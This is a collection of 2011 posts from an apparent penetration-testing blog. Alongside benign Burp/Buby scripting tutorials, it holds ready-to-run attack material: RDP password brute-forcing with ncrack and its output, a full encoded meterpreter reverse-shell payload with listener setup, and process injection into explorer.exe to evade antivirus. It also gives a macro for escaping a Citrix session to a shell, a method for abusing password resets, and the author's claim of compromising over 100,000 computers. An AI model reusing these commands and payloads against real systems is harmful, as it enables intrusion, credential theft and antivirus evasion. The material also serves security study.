user@ubuntu:~/pentest/msf3$ ncrack 192.168.1.52:3389,CL=2 --user=username@domain --pass=myl33tpassword -vvv -d7

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-09-29 14:48 PDT

rdp://192.168.1.52:3389 Account credentials are valid, however, the maximum number of terminal services connections has been reached.
Discovered credentials on rdp://192.168.1.52:3389 'username@domain' 'myl33tpassword'
rdp://192.168.1.52:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.90
rdp://192.168.1.52:3389 finished.

My Personal War Against Overuse of Memory Corruption Bugs

2011-09-22T17:07:00.002-04:00

I remember many years ago writing my first buffer overflow, a standard stack bug privilege escalation in I think RedHat 7x which I thought was awesome. I remember writing my first SEH overwrite on windows and marveling at POP POP RET's and spending hours pouring through memory in Windbg wondering why my shellcode was getting trashed. I even remember the moment when I "got" return to libc. Somewhat in contrast to many "researcher" exploit developers and bug hunters, I also break into computers, lots of them. At last count I was well over the 100,000 mark of computers I have personally gotten into, control over and extracted data from. This is not to tell you how awesome I think I am (I'm not, there are IRC script kiddies with 10x the amount of compromises under their belt) but rather provide a statistical frame of reference for what I am going to say next.

Several years ago I decided to pull back from the memory corruption rat race, but I never really talked about why.

When breaking into computers, I almost never use memory corruption bugs. I occasionally, but rarely develop new memory corruption bugs into exploits. Memory corruption bugs IMO are a bad long term return on investment. Sure someone like Charlie Miller can crank out 100 Adobe product crashes in the blink of an eye, but how much skilled time investment is required to take a bug from a crash to a highly reliable, continuation of execution, ASLR / DEP bypassing exploit ready for serious use? Average numbers I have heard from friends who do this all day long are 1 - 3 months, with 6 months for particularly sticky bugs. How many people are there that can do this? Not many. So you have a valuable resource tied up for months at a time to produce a bug which may get discovered and published in the interm ( a process you have no real control over), patched and killed. When was the last time you heard about a really bitchin Windows 7 64bit remote? Its been a while. So you put in all that time and investment to produce a nice 0day only to watch it get killed. Then you start looking for the next one. What's the going price on the market for an 0day? 100k, 200k, etc. Expensive for something with a potentially limited life putting aside that fact that people don't patch anyway for a moment.

So what do I like instead then? I like design flaws that are integral to the way a system works and are extremely costly to fix, that don't barf a bunch of shellcode across a potentially IDS/IPS ridden wire, that simply take advantage of the way things are supposed to work anyway. Lest you think I spend all my time keylogging "password123" let me give some real world examples:

- Proprietary & custom hardware/OS and software system used for some interesting applications. System has a UDP listening service. After reversing the service binary we discovered that it takes a cleartext, unauthenticated protocol blob. The process then, based on whats in the blob, calls another process that execs a variety of system commands. One of these commands sends out a message to the various systems in the network to mount a given network file system and load specified software. So we craft our own protocol blobs build our own network file system with specially crafted malicious software and take over all the systems at once. We spoke with the designers of the system about what it would take to change it, and due to various rules and policies we were looking at 18-24 months to push out a redesign, and thats after whatever time was needed to develop the new system.

- Foreign Client/Server ERP system that handles supply chain and even has some tie ins with some SCADA components. Authentication works as follows: Client enters a username and password. Client app connects to the server and sends an authentication request with the provided Username. The server checks to see if the username exists and if so it sends a hash of the user's password back to the client app. The client app checks to see if the local password hash matches the one sent from the server and if it matches the client informs the server the the account is valid and the server then successfully authenticates the client. So yes, very broken client side authentication. But to figure that out we had to analyse the network traffic between the two as well as reverse engineer the client application and binary patch the client app to always respond with a positive match. And the data or effects gained from compromising this system are way more interesting than your windows 7 home gaming system.

- Large company virtualization cluster using hardware from a well known vendor. Servers provide remote console / kvm functionality for management. Because of a previously unknown authentication vulnerability in the remote console app we were able to boot the server to remote media under our control (i.e. a linux boot disk). We had reverse engineered the virtualization technology in question and developed a custom backdoor which we then implanted by mounting the hard drive from our remotly loaded linux boot environment, allowing us to take control of the cluster.

With the exception of the last server reboot none of these above examples generated any traffic or logs that were flagged by any security system. No IDS or AV to evade. No DEP or ASLR to get around. And low chance of these bugs getting killed due to the cost and time frame involved in fixing them.

I believe that researchers should consider putting some of their time and resources into the above types of design flaws as well as in sophisticated post-exploitation activities. The market value for memory corruption bugs will go up for a while but so will the difficulty and time required to find them, and we have often seen patch release times decrease as well. Eventually that bubble will burst.

Where have you been!?

2011-09-15T11:20:00.012-04:00

I've been busy... :-(

But i do have some upcoming conference speaking engagements coming up.

So. If you are heading to BruCon

catch me and Joe McCray talk about Pentesting High Security Environments.

If you are heading to DerbyCon

Catch me and Rob Fuller talk about The Dirty Little Secrets They Didn’t Teach You In Pentesting Class

Lastly, if you'll be in Switzerland for Hashdays

You can catch me talk about From Low to Pwned.

I'll also be giving a talk at the Management workshop on Information Operations for Management (sorry the info isn't on the site yet but should be here https://www.hashdays.ch/management-session.html at some point).

I'm sure there will be more stuff in November/December its just not scheduled yet.

Using ncrack to test for servers vuln to Morto worm

2011-08-29T11:43:00.006-04:00

Looks like the Morto worm is floating around. I frequently run into just seeing 3389 open on pentests and if the local admin account is "administrator" you can beat up on it pretty good with ncrack.

hdm did a post on why/how you can find those pesky local admin accounts with weak password by using the smb_login module. post is here.

If you live where someone is gonna give you a hassle because SMB is not allowed out, you can always use ncrack to prove your point. I did a short post on it awhile back.

Anway, grab it from nmap svn, and compile, dont think the RDP plugin for it was enabled in the downloadable binaries (i didnt check...i use the svn).

The F-Secure blog has the list of passwords its using here.

Looks like this:



$ ncrack -vv -d7 --user administrator -P /home/user/morto.txt 192.168.26.137:3389,CL=2



rdp://192.168.26.137:3389 (EID 1) Login failed: 'administrator' 'admin'

rdp://192.168.26.137:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.94

rdp://192.168.26.137:3389 (EID 2) Login failed: 'administrator' 'password'

rdp://192.168.26.137:3389 last: 0.00 current 0.50 parallelism 2

...

Discovered credentials on rdp://192.168.26.137:3389 'administrator' 'admin123'

rdp://192.168.26.137:3389 last: 0.02 current 0.01 parallelism 2

rdp://192.168.26.137:3389 Increasing connection limit to: 2

rdp://192.168.26.137:3389 (EID 30) Attempts: total 30 completed 30 supported 1 --- rate 1.62

rdp://192.168.26.137:3389 (EID 31) Login failed: 'administrator' '1234567890'

rdp://192.168.26.137:3389 finished.

rdp://192.168.26.137:3389 (EID 31) Attempts: total 31 completed 31 supported 1 --- rate 1.81

nsock_loop returned 3



Discovered credentials for rdp on 192.168.26.137 3389/tcp:

192.168.26.137 3389/tcp rdp: 'administrator' 'admin123'



Ncrack done: 1 service scanned in 18.00 seconds.

Probes sent: 31 timed-out: 0 prematurely-closed: 0



Ncrack finished.

Abusing Password Resets

2011-07-11T08:04:00.001-04:00

Dave Ferguson has beaten up on forgotten/reset password functionality for some time and recently participated in an OWASP podcast where he discussed these problems. The podcast reminded me of some techniques I've used in the past which have been successful and may be worth sharing. Accessing other user's accounts with insecurely coded forgot/reset password functionality is more common than you might think.

This posts focuses on analyzing entropy and inline password resets, two major problems with forgot/reset password functionality. To do this, we have to automate both requesting a forgot password hundreds of times and parsing thru all of the e-mails we receive. Thanks to the recently added macro support now available in Burp (thanks PortSwigger), less effort is required on our part when an application employs anti-automation features to prevent such attempts.

For those not familiar with BurpSuite's Macro support, lets walk thru this.

So here is a picture of the email reset we've been sent:

To initiate a password reset request it is a four part request & response pair sequence. This sequence is saved in our proxy history. We need to navigate to Options > Sessions > Macros > New and highlight the four messages saved in the proxy history to create and configure the new macro.

Take a look at the screenshot below:

Okay now we need to configure each individual request/response to extract data we want. We have to grab a JSESSIONID and a struts token. Lets highlight the first request/response and configure.

Example of configuring one of the items

You'll notice that for the first request I've chosen to not use cookies in the cookie jar. This is because I want to start the sequence clean and without a cookie.

Notice the struts.token.name and struts.token are dynamic and changing so we derive these from the response. The rest are preset values like email and birthdate (no, not my real birthdate). One thing that is important to notice is that I've decided to uncheck URL encode for the email portion. It is already URL encoded so no need. Otherwise it will cause problems.

Name the Macro

The next piece requires you to add the macro to a session rule. Again Options > Sessions > Session Handling > New. Highlight the macro you'd like to use.

Next, you'll need to add the pages to scope:

Now send the original, first request (I do this at the proxy history portion of Burp) over to intruder, select null payloads and set it for a number that is large enough to collect a big portion of passwords so we can review entropy. You'll see below that Intruder is configured to send the password reset sequence 800 times. Again, this will initiate the macro each time, so you are essentially resetting the password 800 times.

Next we need to retrieve the emails from gmail and review them for entropy. Here is a script I've written to retrieve emails from gmail, parse for the password values and write to a file called tokens.txt:

Lines 11-17:

Line 12: File we will place all of our emails in (make sure you create an inbox folder)
Line 13: Initialize Pop class
Line 14: Enable SSL
Line 15: Replace with your username and password
Line 16: Call the check_for_emails method with the pop obj

Lines 20-27:

Line 21-22: If we no emails, print that fact out to the screen
Line 24-25: We have emails, print that fact to the screen and call place_emails_into_file method with the pop object.

Lines 31-36:

Line 31: Iterate thru pop array
Line 32: Open the file (line 12)
Line 33: Write the messages to the file
Line 36: Call the create_file_with_tokens method

Lines 40-53:

Line 41: Create a new_file object which is a file called tokens.txt
Line 42: Create a read_file object which reads the inbox/emails.txt file from Line 12
Line 43: Begin reading each line from the read_file
Lines 44-46: If the line matches the "password: somepassword" write it to a file.
Line 53: Kick the whole thing off

Review the tokens.txt file

We can see that the new passwords sent aren't very random. We can load this in burp sequencer but there really isn't any point when it is this easy. It is obvious that the developer has two separate arrays of words and and another array of numbers. They pick "randomly" from that pile and concatenate the values. Here is the actual line of code I wrote to do this and yes this is a real-life example that I've come across:

Factors that could slow us down:

1) If we can't enumerate e-mail addresses somehow. An example of enumeration would be if you type in a username/e-mail address and and the site tells you it doesn't exist. Now we know who DOES exist on the system.

2) This particular site requires a birthdate along with the email address. This is difficult but not impossible. If we know the e-mail address exists it is a matter of guessing the birthdate (automate w/ Intruder).

3) After we've reset other user's passwords, we need to guess the password (made MUCH easier by reviewing the entropy). If an account lock-out policy is enforced (after a small amount of incorrect password submissions) the account may be locked out leaving us without access. That is no fun.

Even if the reset or forgotten password function doesn't send us a clear-text password it may send us a reset link. It is important to review the randomness of that link.

Here is an example of loading the tokens file in sequencer:

Summary:

We've bypassed struts token and multi-flow password resets which might have been intended to slow us down. We've collected all of our emails and parsed them for passwords/tokens/links. We've manually (in this case) reviewed the entropy but we can also do this with sequencer. Now we have a way to guess passwords more efficiently and in combination with other flaws leaves us just a short period of time from compromising accounts.

~cktricky

Facebook Forensics

2011-07-05T12:38:00.003-04:00

Hi dudes, we have got a studies over facebook forensics, please feel free to reference and enjoy it from here. Special thanks to Captain's leading on this studies, Taku and Sweeper's analysis and Leng's detailed paper review:
http://goo.gl/2TIr9

Process Injection Outside of Metasploit

2011-07-01T07:12:00.019-04:00

You may find yourself needing to do process injection outside of metasploit/meterpreter. A good examples is when you have a java meterpreter shell or you have access to gui environment (citrix) and/or AV is going all nom nom nom on your metasploit binary.
There are two public options I have found; shellcodeexec and syringe.

Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.

shellcodeexec

https://github.com/inquisb/shellcodeexec

http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html

= Short description =

shellcodeexec is a small script to execute in memory a sequence of opcodes.

"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."

"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."

Make the payload:


$ ./msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPOyIuEaN2PdNkRrP0LKCbT
LNkQBVtNkT2VHTOX7QZGVTqIoVQIPLlGLPaQlC2TlEpKqZoVmC1ZgZBXpQBPWLKCbVpLKQRElGqZpLKQPRXK5IP
T4CzGqN0RpLKPHVxNkV8EpVaXSKSGLRiLKP4LKEQZvTqIoP1O0NLIQZoVmGqXGTxM0T5ZTGsCMIhEkQmTdPuIrR
xNkQHTdGqICRFNkVlPKNkPXELVaICNkC4NkGqZpK9CtVDEtCkCkPaV9QJPQKOM0PXCoPZNkTRZKNfQMCXEcTrEP
C0CXPwRSVRQOPTPhPLCGGVC7KOZuNXZ0GqEPEPVIZdQDV0PhQ9K0PkC0KOIERpPPV0PPQPPPQPPPCXZJTOIOKPK
OKeOgQzC5E8O0I8OxC1E8TBGpR1ClOyIvPjR0QFPWPhZ9OURTE1IoZuK5IPCDTLKORnVhRUZLE8XpLuI2PVKOIE
RJC0QzC4QFV7QxVbN9ZhQOIoZuNkTvRJG0E8EPVpGpEPRvPjGpCXRxLdCcIuIoIENsPSCZGpRvCcV7CXGrIIZhQ
OKOKeEQKsVIO6NeIfT5ZLKsAA

Set up a listener to catch the shell:

$ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

Run it on the windows side:

C:\WINDOWS\Temp>shellcodeexec.exe [msfencode's encoded payload]
**Must paste in the payload, cant be a .txt

Once you have shell you need to migrate out of it, it will be in the shellcodeexec process and as soon as someone ctrl-c or kills that cmd.exe the process dies and so does your shell

Looks like this:

Syringe

http://blog.securestate.com/post/2011/06/21/Syringe-utility-provides-ability-to-inject-shellcode-into-processes.aspx

http://www.securestate.com/Documents/syringe.c

= Short description =

"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"

To compile “C:\codelocation\cl syringe.c”

C:\Documents and Settings\User\Desktop>syringe.exe
Syringe v1.2
A General Purpose DLL & Code Injection Utility

Usage:

Inject DLL:
       syringe.exe -1 [ dll ] [ pid ]

Inject Shellcode:
       syringe.exe -2 [ shellcode ] [ pid ]

Execute Shellcode:
       syringe.exe -3 [ shellcode ]

-3 same issue as shellcodeexec, close cmd.exe or ctrl-c lose shell

-2 is preferred, located explorer.exe inject shellcode into that


C:\Documents and Settings\User\Desktop>tasklist  
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
smss.exe                     540 Console                 0        424 K
csrss.exe                    604 Console                 0      3,852 K
winlogon.exe                 628 Console                 0      5,012 K
services.exe                 680 Console                 0      3,440 K
lsass.exe                    692 Console                 0      1,408 K
vmacthlp.exe                 848 Console                 0      2,756 K
svchost.exe                  864 Console                 0      4,924 K
svchost.exe                  944 Console                 0      4,308 K
MsMpEng.exe                 1040 Console                 0     53,812 K
svchost.exe                 1076 Console                 0     23,780 K
svchost.exe                 1164 Console                 0      3,616 K
svchost.exe                 1368 Console                 0      3,916 K
explorer.exe                1624 Console                 0     15,256 K
spoolsv.exe                 1656 Console                 0      6,072 K
VMwareTray.exe              1848 Console                 0      5,044 K
VMwareUser.exe              1856 Console                 0      6,328 K
msseces.exe                 1864 Console                 0     10,708 K
jusched.exe                 1920 Console                 0      4,304 K
msmsgs.exe                  1928 Console                 0      2,488 K
ctfmon.exe                  1952 Console                 0      3,248 K
svchost.exe                  740 Console                 0      3,760 K
jqs.exe                     1108 Console                 0      1,396 K
vmtoolsd.exe                1264 Console                 0      9,976 K
VMUpgradeHelper.exe         1212 Console                 0      4,176 K
TPAutoConnSvc.exe           2396 Console                 0      4,392 K
alg.exe                     2680 Console                 0      3,612 K
TPAutoConnect.exe           3060 Console                 0      4,848 K
iexplore.exe                3784 Console                 0     16,300 K
iexplore.exe                4064 Console                 0     45,392 K
wuauclt.exe                 1224 Console                 0      4,276 K
java.exe                    1112 Console                 0     27,516 K
java.exe                    2520 Console                 0     14,272 K
notepad.exe                  440 Console                 0      3,572 K
jucheck.exe                 3112 Console                 0      6,120 K
cmd.exe                     3260 Console                 0      2,700 K
tasklist.exe                3332 Console                 0      4,580 K
wmiprvse.exe                3368 Console                 0      5,824 K

C:\Documents and Settings\User\Desktop>syringe.exe -2 PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHMYEPGpEPE0NiXeVQXRQ
tNkCbTpNkRrVlLKPRVtNkRRExVoLwRjVFVQIoTqKpLlElCQCLVbVLQ0KqZoTMEQZgXbXpCbRwLK
CbVpNkCrElVaXPNkQPRXLEO0CDRjVaN0RpNkCxEHNkPXQ0VaICIsElG9LKP4LKEQZvVQIoTqKpL
lIQXOTMVaZgEhIpCEL4TCQmIhGKQmEtPuKRRxNkPXTdEQN3E6NkVlPKLKPXELGqICNkC4LKC1Zp
LIQTVDEtQKCkPaRyQJRqIoM0RxQOPZLKVrZKK6QMCXPnQuT4C0E8T7PiRNCYNiZFPTE8RlCGEvT
GIoZuTqKOPWRwV7RwPVPhEjPVQiLgKOXUZKCoCkEaO9V1PQQzTCRqCaCXKKQ0C0EPV3V0CXV7Oy
OoIVIoN5XkRhCiVQXRCbRHGpTrIpNdCbQBCbRqCbRpE8XkQEVNEkKOKeOyIVCZGrQKP1KOPWRwV
7CgRvE8VMVfGhQkIoZuOuO0RUTnPKCDTdE8K0VSGpGpOyKPPjC4RpQzEOCfRHT5PFOnK6IoXUZK
ZuXkQYM8McKOKOKOVOQQQhCtRBRPC0E8ZPMeNBV6IoXURJCpQxC0TPC0C0PhGpC0CpEPV7PhQHO
TPSM5KOKeOcPSV3LIIwRwPhEPEpEPEPRsV6E8EBZ6K9M2KOZuK5O0RTXMNkGwEQISMUKpPuXeQH
ZcM8RqIoIoKOEaP9GBVNTqGFP8VNEbGFTnP1VSVXEPAA 1624

Looks like this (you can use the same shellcode in syringe):

Welcome Ken "cktricky" Johnson!

2011-06-24T20:41:00.000-04:00

Ken "cktricky" Johnson has agreed to join the carnal0wnage/attackresearch blog and I cant be more excited. Ken brings tons of webappsec kung fu and is the core developer for wXf. He should be adding lots of webappsec goodness.

you can catch him on twitter as well @cktricky

Welcome Ken!

-CG

Restricted Citrix Excel Application Escapes

2011-06-23T11:38:00.029-04:00

SynJunkie has a couple good posts on citrix escapes:

http://synjunkie.blogspot.com/search/label/Citrix

and of course iKat

http://ikat.ha.cked.net/

So recently I had to break out of restricted citrix environment. All I had was Excel 2010 and Word 2010.

I also didnt have a fancy "jump to url" option when I clicked on the title bar and none of the hot keys were working for me. So goal was to get a web broswer or cmd shell.

I was able to create macros though. So first I added the developers ribbon.

Click the visual basic button, and paste in some sweet macro code.

Then you save the file as macro enabled workbook.

Once its saved, you can hit the macro button and run your macro.

and get shell

** To be clear all of this is running remotely on the citrix host.**

The macro code

Sub GETSHELL()
'execute EXE file
Shell "CMD /K C:\windows\system32\cmd.exe", vbNormalFocus
End Sub

You could also just type a url into excel...

and click it..But that's pretty low tech and not much fun :-)

Again this IE browser is running remotely on the citrix host. From here you can client-side exploit yourself...i.e. java applet exloit... to get your outbound shell.

Strategic Security -- Exploit Development Course

2011-06-19T17:41:00.003-04:00

Joe McCray with Strategic Security is running a two week exploit dev course.

Course Description & Instructor Information:

http://strategicsec.com/Exploit-Dev-Courses-Oct-2011.pdf

Strategic Security has teamed up with Net-Square to provide the most comprehensive exploit development course package available to the public. Occasionally similar courses are offered privately to various three letter agencies and large financial institutions.

Exploit development is often considered the most difficult area of focus in the entire field of IT security. It requires both a broad range of skills and deep level of knowledge in Networking, Operating Systems, and Programming. Now you too can learn what has long been thought to be "Black Magic" by many from one of the top practitioners and trainers in the world.

How is this course put together?
The course is actually a 2 week package deal designed to both teach the fundamentals of modern exploit development and give the student ample guided practice time with the instructor to actually get proficient.

Dates:

Exploit Dev: No Assembly Required Oct 31 - 4 Nov 2011 (5 Days)
Exploit Dev: Target Practice Nov 7 - 11 2011 (5 Days)

Training Location

The workshops will be held at "The Academy of Computer Education" in Greenbelt, MD.
The address is:

7833 Walker Drive, Suite 520C Greenbelt, Maryland 20770

$1000 Discount by using these links

Exploit Dev 1 Week @ $5,000
http://tinyurl.com/SS-EDNAR-D-CG

Exploit Dev 1 Week @ $6,000
http://tinyurl.com/SS-D-EDTP-CG

Exploit Dev 2 Week Package Deal @ 8,500
http://tinyurl.com/SS-EDNAR-TP-D-CG

Incident Analysis: Million Dollars Lost In A Minute

2011-06-15T23:36:00.013-04:00

Dudes, I and two other fellows have dealt with an incident about a victim whose online banking account has been compromised and a huge lumpsum of money is transferred out to eastern europe. In fact, the victim is still using the old two-factor authentication token, it means we cannot identify the generated passcode is for authentication, money transfer to a specific account , bill payment, etc, attacker manipulates it indeed. Please download it from here.
goo.gl/FVFBO
Enjoy it, mate ;-)

wXf module buby/keyword_search_send

2011-06-03T08:55:00.001-04:00

I've created a video on how to use the latest module addition to the buby family of modules in wXf. The purpose behind the module is to search Burp's history and seek out parameters in requests to an application which match our list of keywords. The keywords are basically parameters that might warrant manual analysis.

Consider we've made the following requests:

http://www.example.com/welcome.php

http://www.example.com/resource.php?accountid=

http://www.example.com/help.php?page=1

Most folks would agree that the request with a parameter of accountid warrants some manual analysis. On a larger scale (think thousands of requests), this can be tedious to search and then send to intruder or repeater. So the idea is that we have a keyword list to help speed things up, when a match is found, an alert is sent to burp and the request is sent over to repeater & intruder for manual analysis.

As of now the keyword list in wXf isn't huge but I plan on adding to it over the next few days. If you'd like to utilize GitHub's fork/edit/merge function to contribute interesting parameter names please fork the following file.

If you have a personal keyword list that you'd like to use privately that is okay too. The video shows you how to add a file under the datum directory and reload the list of "lfiles" (files under the datum directory).

Don't forget that if you have questions on usage, installation or anything else we've provided documentation here .

Lastly, here is the video:

wXf module buby/keyword_search_send from cktricky on Vimeo.

carnal0wnage/Attack Research Blog Back On Blogger

2011-05-23T21:08:00.005-04:00

Carnal0wnage/Attack Research Blog is back on blogspot. URL is still http://carnal0wnage.attackresearch.com and http://carnal0wnage.blogspot.com should redirect you to the right place. I doubt that RSS feeds will be so lucky though...you'll probably want to update your feeds.

Hopefully being back on blogger will allow for more and better discussions than on the drupal site and if the blind elephant guy is working on an update, hopefully this fucks up his talk and he doesn't get to call us out this year b/c Drupal sucks to update/manage.

-CG

JRuby + Buby + wXf = fun

2011-05-22T10:56:00.001-04:00

The Web Exploitation Framework has created two separate versions of the console. The version you get depends on the environment it is started in.

If JRuby, as of now, you get a version of the framework that allows you to interact with Burp from the console and run Buby scripts (with the flexibility of changing options easily and quickly).

Here is a video of this new step for the framework:

Buby Module from cktricky on Vimeo.

Documentation can be found at the wiki page for wXf.

For those of you who have been following the Buby Script Basics of this blog, I hope you'll apply that knowledge to creating a module in wXf. This is a great way for us to share our individual scripts in a way that allows them to be customized on the fly (because the console can set options like the rhost, rport, content to extract, etc.)

Anyway, hopefully this new feature of the framework can continue to grow and become a more powerful feature.

Happy Hacking,

~cktricky

Buby Script Basics Part 6

2011-05-15T14:44:00.011-04:00

~~√ evt_http_message~~
~~√ evt_scan_issue~~
√ ~~doActiveScan~~
~~√ doPassiveScan~~
~~√ excludeFromScope~~
~~√ includeInScope~~
~~√ isInScope~~
~~√ issueAlert~~
~~√ sendToIntruder~~
~~√ sendToRepeater~~
√ sendToSpider
√ makeHttpRequest

In this portion of the Buby Script Basics series (Part 6), we cover the sendToSpider and makeHttpRequest methods.

As always, you can find sample scripts for all of the code in this series under the examples directory of the buby-script repo located Here.

The script make_http_request.rb (under examples directory) will be used to demonstrate makeHttpRequest and sendToSpider.

$burp.get method

=============

Line 24 - We defined the method ($burp.get) which takes a url value

Lines 25-27 - If the url is NOT in scope, we send this to the spider function

Line 28 - We used regexp to extract the path of the url

Line 29 - We instantiate an object called 'path' which is the same as path_match

Line 30 - An object called prefix is instantiated, this is where we extract http:// or https://

Line 31 - uri is basically the url minus the prefix (http:// or https://)

Line 32 - Prior to removing a port (such as url:9000), we extrapolate either an IP or hostname

Line 33 - Same deal for port, prior to removing the colon, we create a presub_port object which is the colon + port number.

Line 34 - The port object is created, this is presub_port cast to String type and the colon removed

Line 35 - pre object equals true or false depending on whether or not the prefix is http or https.

Line 36 - rpath (remote path) is the path object. If no path was specified it defaults to '/'.

Line 37 - host is cast to a String type and the presub_port and rpath values are stripped (gives us the true host value).

Line 38 - req_str object is the value of get_req (the method we discuss below).

Line 39 - res object is instantiated and it is the value of the response when makeHttpRequest call is made. 'res' will be a String type.

Line 40 - We print 'res' to the console

get_req method
============

Line 10 - The method get_req is defined, takes three parameters. Host, Port and Path values.

Line 11 - 'str' object is created and cast as a String type.

The important lines here are 12, 13 and 20.

Line 12 - We take the path value and insert it into the first line of the request string.

Line 13 - host and port are concatenated so that www.example.com and 80 become one string value (www.example.com:80)

Line 20 - Notice how we append two newline characters ("\n\n") versus only one newline character like the rest of the string lines. This is important because Burp will error out and fail to send the request if this is missing. This is how Burp differentiates the Headers & Body and even if the body is missing Burp still needs the marker (two newlines) to mark the end of the headers section and understand the request.

That is it, go ahead and try the script out and when you run it make sure you choose the -i or interactive option. Example:

$ jruby -S buby -i -B burp_pro.jar -r make_http_req.rb

At the console, to run the this method, you can type the following (examples):

$burp.get('http://www.example.com')

$burp.get('http://www.example.com:9050')

$burp.get('http://www.test.com:3333/test/test.aspx?error=error.jpg')

Buby Script Basics Part 5

2011-05-14T22:49:00.002-04:00

~~√ evt_http_message~~
~~√ evt_scan_issue~~
√ ~~doActiveScan~~
~~√ doPassiveScan~~
~~√ excludeFromScope~~
~~√ includeInScope~~
~~√ isInScope~~
√ issueAlert
√ sendToIntruder
√ sendToRepeater
   sendToSpider
   makeHttpRequest

In this portion of the Buby Script Basics series (Part 5), we will cover all but two of the remaining methods (methods without lines through them) on our checklist.

As always, you can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

The three methods we will cover are issueAlert, sendToIntruder, and sendToRepeater. The example script is called sendto_and_issue_alert.rb and encompasses all three.

The purpose of this script is to check the body of post messages to see if one of the parameters matches our list of interesting parameters (FUZZ_PARAMS) which deserve manual analysis. We'll perform the manual analysis with intruder/repeater and then issue an alert when the request has been sent over.

Unlike the previous tutorials, this script will be ran by invoking the method via the command line.

Example of how to run this script (covered in Part 1 of this series:

$ jruby -S buby -i -B burp_pro.jar -r sendto_and_issue_alert.rb

This script is going to be run against the proxy history, it's going to search the proxy history looking for the interesting requests. After you've interacted with the site type "$burp.run".

If the parameters in the body of the POST message match our interesting params, you should see the following:

Request sent to repeater, notice the name of the tab (it is our fuzz param "Price")

The request has been sent to intruder

Lastly, an alert will appear notifying you that the previously mentioned actions have been taken.

Time to discuss the code that does all this :-)

First we establish parameters that could be interesting to us in terms of performing manual analysis.

This method '$burp.run' is the catalyst for everything that comes next. When the user types $burp.run at the console they are invoking this method.

Line 2 instantiates the proxy_hist object ($burp.get_proxy_history). The fourth line determines if the length is greater than 0. If so, start iterating thru each obj in the get_proxy_history array. Line 7 invokes the hmeth method (passes it the 'obj' object). Line 8 calls extract_str with the result of Line 7 (hmeth...which is the HTTP Method) and the 'obj' object.

The req_meth takes the request_headers, takes the first line and converts it to a string. The '[0..3]' method extracts the first 4 characters of the first line of the request headers. The method returns this value.

Part 1 of extract_str

The extract_str method is where the FUZZ_PARAMS are searched against the request message and sent to repeater/intruder (along with the alert).

The second line splits objs into the http_meth and req objects.

The third line ensures that we do not execute any further code unless the http_meth is a POST method.

Then we instantiate the bparams object as a Hash on line 4.

On line 5, the request_body gets split by the ampersand (so that we break up all the params and their values into key/value pairs (ex: Price=2099.00).

Next, we split these pairs up by the '=' (equal sign) and place each param/value (key/value) into the bparam hash. Conceptually the bparam hash would look like

bparam = {'Price' => '2099.00}

The last line assigns either true or false to the proto object based on whether or not the protocol is https.

Part 2 of extract_str

Here we begin iterating thru each item in the FUZZ_PARAM array. If the bparam hash has as key which matches on of the items in FUZZ_PARAM, we send it to intruder/repeater and issue our alerts.

Explanation of methods:

sendToIntruder(host, port, https, req)
-host
-port
-true/false (for http/https)
-request string

sendToRepeater(host, port, https, req, tab = nil)
-host
-port
-true/false (for http/https)
-request string
-the name of the tab (String value) )

issueAlert(msg)
- Takes only one parameter, a string value. This is what shows up in the alert.

*We will cover the remaining two methods in the next portion of the series. This post turned into a rather long one so it was postponed.

Happy Hacking,

~cktricky

Buby Script Basics Part 4

2011-05-14T02:13:00.001-04:00

~~√ evt_http_message~~
~~√ evt_scan_issue~~
√ doActiveScan
√ doPassiveScan
√ excludeFromScope
√ includeInScope
√ isInScope
   issueAlert
   makeHttpRequest
   sendToIntruder
   sendToRepeater
   sendToSpider

In Part 3 of this series we covered the two methods with lines drawn through them (above: evt_http_message and evt_scan_issue).

In Part 4, the methods with checks next to them will be described along with code examples.

You can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

includeInScope, excludeFromScope

----------------------------------------------

The code here is nothing more than two arrays. The first array, EXCLUSION_LIST, contains items we'd like to exclude from scope. The second array, INCLUSION_LIST, contains items to include.

This following portion of code contains a PREFIX array (both http and https). We perform an iteration of both and while iterating through this prefix array, we start iterating through a second list (EXCLUSION_LIST) and concatenating the prefix + host + the item in the EXCLUSION_LIST. This step is repeated for the INCLUSION_LIST. The $burp.includeInScope() method is called and we submit the concatenated value (url) to it.

do_active_scan, do_passive_scan, isInScope

----------------------------------------------------

The def $burp.evt_proxy_message is a familiar one at this point in the series so we won't discuss this in detail. The code @@msg = nil exists solely to instantiate a global object called msg. We will need to keep an object associated with the request message (headers/body) because passive scanning requires both a request message and response message.

pre = is_https? 'https' : 'http' is just a way to define the "pre" object based on whether or not it is http or https message.

pre_bool does the same thing as the pre object but instead of http/https it is a true/false.

uri = "#{pre}://#{rhost}:#{rport}#{url}" is just the url (string concatenation).

The last three lines of code here basically set the @@msg value. We only want to do this if it is a request. Remember, we need an object to hold the request message so that even if the current message is a response we can call both the request message and response message.

